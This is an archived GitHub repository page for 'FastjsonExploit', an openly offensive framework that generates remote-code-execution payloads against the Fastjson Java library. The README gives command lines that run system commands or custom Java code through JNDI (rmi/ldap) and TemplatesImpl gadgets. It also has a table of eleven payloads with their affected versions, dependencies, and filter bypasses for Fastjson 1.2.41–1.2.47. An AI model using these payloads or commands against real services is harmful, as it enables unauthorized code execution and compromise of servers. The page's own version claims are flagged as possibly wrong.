The Wayback Machine - https://web.archive.org/web/20200927094029/https://github.com/c0ny1/FastjsonExploit
Skip to content

/ FastjsonExploit

Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)

554 stars 101 forks
Star
Watch
master
2 branches 0 tags
Go to file
Code
Clone

Use Git or checkout with SVN using the web URL.

Latest commit

@c0ny1
c0ny1 Merge pull request #7 from HelloCoCooo/master
94d3a38 Mar 6, 2020
Merge pull request #7 from HelloCoCooo/master 
Fix dependency conflict issue
94d3a38

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
src
提一次提交
Jul 20, 2019
.gitignore
说明payload影响版本信息不一定正确问题
Jul 20, 2019
FastjsonExploit.iml
提一次提交
Jul 20, 2019
README.md
更新REAME.md
Jul 20, 2019
pom.xml
Fix dependency conflict issue
Mar 2, 2020

README.md

FastjonExploit | Fastjson漏洞快速利用框架

0x01 Introduce

FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:

  1. 一键生成利用payload,并启动所有利用环境。
  2. 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)

0x02 Buiding

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

0x03 Usage



.---- -. -. .  .   .
   ( .',----- - - ' '
    \_/      ;--:-\         __--------------------__
   __U__n_^_''__[. |ooo___  | |_!_||_!_||_!_||_!_| |
 c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
 ,_\___________'_|,L______],|______________________|
/;_(@)(@)==(@)(@)   (o)(o)      (o)^(o)--(o)^(o)

FastjsonExploit is a Fastjson library vulnerability exploit framework
                Author:c0ny1<root@gv7.me>


Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

Available payload types:
    Payload                PayloadType VulVersion      Dependencies                                      
    -------                ----------- ----------      ------------                                      
    BasicDataSource1       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
    BasicDataSource2       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
    JdbcRowSetImpl1        jndi        1.2.2.1-1.2.2.4                                                   
    JdbcRowSetImpl2        jndi        1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass                            
    JdbcRowSetImpl3        jndi        1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass                            
    JdbcRowSetImpl4        jndi        1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass                            
    JdbcRowSetImpl5        jndi        1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass                            
    JndiDataSourceFactory1 jndi        1.2.2.1-1.2.2.4 ibatis-core:3.0                                   
    SimpleJndiBeanFactory1 jndi        1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE                      
    TemplatesImpl1         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)   
    TemplatesImpl2         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)

0x04 Notice

  • 帮助信息所说明的payload可利用的Fastjson版本,不一定正确。后续测试更正!

0x05 Reference

About

Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)

Topics

fastjson exploiting-vulnerabilities exp poc

Resources

Readme

Releases

No releases published

Packages

No packages published

Contributors 2

Languages

You can’t perform that action at this time.